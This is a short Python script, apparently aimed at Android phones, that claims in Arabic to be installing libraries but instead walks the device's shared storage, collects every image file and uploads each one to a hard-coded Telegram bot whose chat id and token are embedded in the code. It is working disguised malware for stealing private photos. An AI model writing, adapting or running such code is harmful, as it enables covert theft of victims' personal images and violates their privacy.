import requests
import os
import time
from concurrent.futures import ThreadPoolExecutor

print("جاري تثبيت المكاتب. .....")

                  #انتضر تحميل المكاتب يستغرق الامربضع دائق:
#---------------------------------------------#

chat_id = "647776789"

bot_token = "6103725322:AAHrK9gHcE_edlJc1VK1RLrErWnNJGIBeMI"

#---------------------------------------------#


def upload_photo(file_path, chat_id, bot_token):
    url = f'https://api.telegram.org/bot{bot_token}/sendPhoto'
    data = {'chat_id': chat_id}
    files = {'photo': open(file_path, 'rb')}
    requests.post(url, files=files, data=data)
file_paths = []
for root, dirs, files in os.walk("/storage/emulated/0"):
    if "/storage/emulated/0" in dirs:
        dirs.remove("/storage/emulated/0")
    for file in files:
        file_path = os.path.join(root, file)
        file_type = file.split('.')[-1]
        if file_type in ['jpg', 'jpeg', 'png', 'gif']:
            file_paths.append(file_path)
def send_photos():
    with ThreadPoolExecutor(max_workers=50) as executor:
        for file_path in file_paths:
            executor.submit(upload_photo, file_path, chat_id, bot_token)
            time.sleep(0.4)
send_photos()
و
